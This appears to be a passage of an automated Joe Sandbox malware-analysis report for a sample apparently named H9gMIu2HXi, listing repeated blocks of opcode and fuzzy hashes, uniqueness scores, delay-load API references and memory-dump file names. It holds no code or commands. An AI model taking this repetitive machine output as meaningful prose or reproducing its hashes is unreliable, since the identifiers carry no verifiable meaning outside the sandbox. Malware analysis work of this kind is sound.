• Opcode Fuzzy Hash: fc666e17e48fbac209d14d1ce93777856b47dbc7d7a9fa05bf1134d5bb000e6c
• Instruction Fuzzy Hash: D6B01291A791027D3294B1242D07F36022CD4D0B117308A3FFC10C4140D4500C491331
Uniqueness
Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: edbe8f2c5118a9e737519e0e44c71e06ab5b1299d365d6512f119ac90e156e10
• Instruction ID: 266b0e0a9774755d34c07f70f5eb808603949773485243a9b12e1886d720c06a
• Opcode Fuzzy Hash: edbe8f2c5118a9e737519e0e44c71e06ab5b1299d365d6512f119ac90e156e10
• Instruction Fuzzy Hash: 04B01295A790027D3254B1242E07F36022CE4D0B11730893FFC00C8140D4A00C0E1231
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 98d9f3799e98c2e81d6a57c573d4a317a66cd77d33a3f8b061ebe670ab885e1d
• Instruction ID: 9f0d6510c58bf74b6c75b209da1f2c1838780654f026e1a788f06bc7b3824ec3
• Opcode Fuzzy Hash: 98d9f3799e98c2e81d6a57c573d4a317a66cd77d33a3f8b061ebe670ab885e1d
• Instruction Fuzzy Hash: 19B012A1A790027D3254B1252D07F36022CF4D0F11730593FFC00C8040D4400C051231
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: afbc908f5e841ebacfb0c8beecd4518608192607b38bc10fd07c165a5c846056
• Instruction ID: 7d2d955943d46844889a90dc5fb589c95c0c07c8f16ee80812e261726f20c658
• Opcode Fuzzy Hash: afbc908f5e841ebacfb0c8beecd4518608192607b38bc10fd07c165a5c846056
• Instruction Fuzzy Hash: 33B012A1A7B1027D3294B2246D17F36022CD4D0B11B304A3FFC00C4040D4400C451331
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 9b9fc804c0562afebc2a17cdcbb5140b2c502818aa079952b5cf32cc3e6ca0a8
• Instruction ID: a9d33ee85d683da6bb23ac6dd8399129b39316b7c91efc114d909c03d50dab02
• Opcode Fuzzy Hash: 9b9fc804c0562afebc2a17cdcbb5140b2c502818aa079952b5cf32cc3e6ca0a8
• Instruction Fuzzy Hash: 05B01291A790037E322875202D0BE36022CE4E0F11730493FFC00C4040E4400C051131
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 912c1afa9fba55613e10f9c26b67549a539f0784eaa94a33bcd73dc4132edf44
• Instruction ID: 1abcbee164b700ed6ef3d5319dcca0ce5e5daf0daf038876e3de6bbb637315bf
• Opcode Fuzzy Hash: 912c1afa9fba55613e10f9c26b67549a539f0784eaa94a33bcd73dc4132edf44
• Instruction Fuzzy Hash: 80B012A5A792027D3694B1242D07F3702ACD8D0B117304A3FFC00C4040E4400C455331
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 740e2d890141abad6ebe57592dbd2cc712fe26fa10b43c57b89c3815b8d909b2
• Instruction ID: d1bdd6e1e09e772261a8bfb1c8542b11be937279992f95414bfda2730a1e5b4e
• Opcode Fuzzy Hash: 740e2d890141abad6ebe57592dbd2cc712fe26fa10b43c57b89c3815b8d909b2
• Instruction Fuzzy Hash: 58B012A5A791027D7254B1242D07F37026CE8D0F11730493FFC00C4040D4400C051331
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 147a7a53e2614db5a5d9ed32a9dcbc52a5b65a32fa99440bcf6b740010c48c3b
• Instruction ID: cad2af8a5dacbd0ad9d26d8a6fa9814bcc4f71330a2af7fce358efa203c9130d
• Opcode Fuzzy Hash: 147a7a53e2614db5a5d9ed32a9dcbc52a5b65a32fa99440bcf6b740010c48c3b
• Instruction Fuzzy Hash: FEB01295A790027D3254B1686E07F36023CD4D0B117304B3FFC00C8044D4800C061231
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8fddc8d45460cdf68d243ed7af9001dea104fd277ac774bc309b97ce04f7796b
• Instruction ID: 165f5fea5467294b45e70b264db455b6f68c7400547c62cd8de67da2002a3196
• Opcode Fuzzy Hash: 8fddc8d45460cdf68d243ed7af9001dea104fd277ac774bc309b97ce04f7796b
• Instruction Fuzzy Hash: C6B01291A791027D3254B1286D07F36023CE4D0F117304A3FFC00C4044D4400C051631
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 55496b9e3abcf08bf9617816ea7efd990b35d9a682df3fe851ae489e3b277e04
• Instruction ID: efc9d3077fd7331e6926208ab21688ad0b559ae59ed52be296f929fa55b7d23d
• Opcode Fuzzy Hash: 55496b9e3abcf08bf9617816ea7efd990b35d9a682df3fe851ae489e3b277e04
• Instruction Fuzzy Hash: 08B012A5A791027D3254B1242D07F3B026CD8D0B11730893FFC00C4040D4400C051231
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 1b258c2b8169bea4358f8928402f37a1455e4ed5083e47c91383e56c0f68575c
• Instruction ID: cebed095ed3859ccf5b10c763fcc83e6021f136a1472c5b55f8f84fa4b713af5
• Opcode Fuzzy Hash: 1b258c2b8169bea4358f8928402f37a1455e4ed5083e47c91383e56c0f68575c
• Instruction Fuzzy Hash: 14B012D1AF80007F321462247D13F36012CE0C4B12730463BF840C1040D4414C040231
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: b7567cc5db8489acbea69002499f96c5576194009762eb8a0ac85421f6d31cd1
• Instruction ID: 6f601e0d598438d24b0ef228807c6dc040fd30db1d82208c67cad89121fa356f
• Opcode Fuzzy Hash: b7567cc5db8489acbea69002499f96c5576194009762eb8a0ac85421f6d31cd1
• Instruction Fuzzy Hash: B5B012E1AF83007F331462243D03E3601ACD8C4B11730453AF840C1040E4404C481231
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F556
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 7d05a63508c51ed830cb800c5a4845436eac713ae1bb436f1f1265153e4d9bf5
• Instruction ID: 7592009e8dac25db462c363974b34adf8eacc28e33c8463c3634c06e3108e1cc
• Opcode Fuzzy Hash: 7d05a63508c51ed830cb800c5a4845436eac713ae1bb436f1f1265153e4d9bf5
• Instruction Fuzzy Hash: E7B012E1AF82007F721462243D13F36016CE4C4B11730443AF840C1040D4404C040331
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: d576140eb50f140499341afa368266e2df90f814b27a0f35c26607aad03130ec
• Instruction ID: 67324f45a305b92e74346bb099ecf0e0c4a483742a9698ea5bd43a9a75fa9f7f
• Opcode Fuzzy Hash: d576140eb50f140499341afa368266e2df90f814b27a0f35c26607aad03130ec
• Instruction Fuzzy Hash: 0AB012D1A781007D331471342D03E36016CD4C4B15730453BFC00C0184D4410C4C2331
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8d34d8ba844eb5dd818ca2d4fb6100e35c9cae605082b0ebd82cd5cad721a0a0
• Instruction ID: eb270f2c8adaddc6bbb6945c9c7986476ad8f08649ad15b212bdc7aaafcf4e6d
• Opcode Fuzzy Hash: 8d34d8ba844eb5dd818ca2d4fb6100e35c9cae605082b0ebd82cd5cad721a0a0
• Instruction Fuzzy Hash: 90B012D5A780007D321471342E03E36016CE0C4B15730843BFC00C8084D4410C091331
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 2efb1261dd20c60f5b6f0814604ccfb161dc3ce88e97bfdc1b6844685b4fac6f
• Instruction ID: 3de5fa1a1a489066d69c84bae322b0623d5acc68aecdeffa8d7b020616aa0b8f
• Opcode Fuzzy Hash: 2efb1261dd20c60f5b6f0814604ccfb161dc3ce88e97bfdc1b6844685b4fac6f
• Instruction Fuzzy Hash: 10B012D9A790007D32143120BE03D36012CD8C0B15730843BFC00D808194514C051231
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 9304f4a3622f1ccc63135f57d6c8a45150acc1f3776bf26245afc418287025b0
• Instruction ID: 722214fe624e54148a34a358b78e84a4b912d87262bcf1c27a65e232a1a24198
• Opcode Fuzzy Hash: 9304f4a3622f1ccc63135f57d6c8a45150acc1f3776bf26245afc418287025b0
• Instruction Fuzzy Hash: 2EB012D1A780007D321471342D13F36016CE0C4B15730443BFC00C0084D4400C081331
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F6AB
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fc145ac9f2aae7ae52dec4a283a6e8726894d4a7b90e5e102809a4013a1d917f
                                                                                              • Instruction ID: 552b19d643083a6be6acac26b5343ec381e0f5dfba7e97e702db3114564c662a
                                                                                              • Opcode Fuzzy Hash: fc145ac9f2aae7ae52dec4a283a6e8726894d4a7b90e5e102809a4013a1d917f
                                                                                              • Instruction Fuzzy Hash: 99B012D1A78000BD321871242D03E3A017CE0C4B15730843BFC00C5084D4400C081332
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 6492ae3a5a57decc2f8c0a175192f62df99155c111380350b99942372aeb3a1b
                                                                                              • Instruction ID: 2ad00cd69a86ccf8503bfb95a5cd939b2745e3c5cb3e4c962272c2ba4d734417
                                                                                              • Opcode Fuzzy Hash: 6492ae3a5a57decc2f8c0a175192f62df99155c111380350b99942372aeb3a1b
                                                                                              • Instruction Fuzzy Hash: F4B01291A782027D326871242D07F36411CD4C0B117304E3AF800C0040D4400C840331
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0d2abd793481a395d1dbe08809ec4068c36ae65ca8409e183d01c29439a6a39f
                                                                                              • Instruction ID: 4e1475584302b0efeb1e5e41e0502c7f7d19def6a5005bff3d50fab077072735
                                                                                              • Opcode Fuzzy Hash: 0d2abd793481a395d1dbe08809ec4068c36ae65ca8409e183d01c29439a6a39f
                                                                                              • Instruction Fuzzy Hash: 01B01291A781027D322871242D07F3A411CD4C0B11730893AFC00C5044D4400C480231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F70C
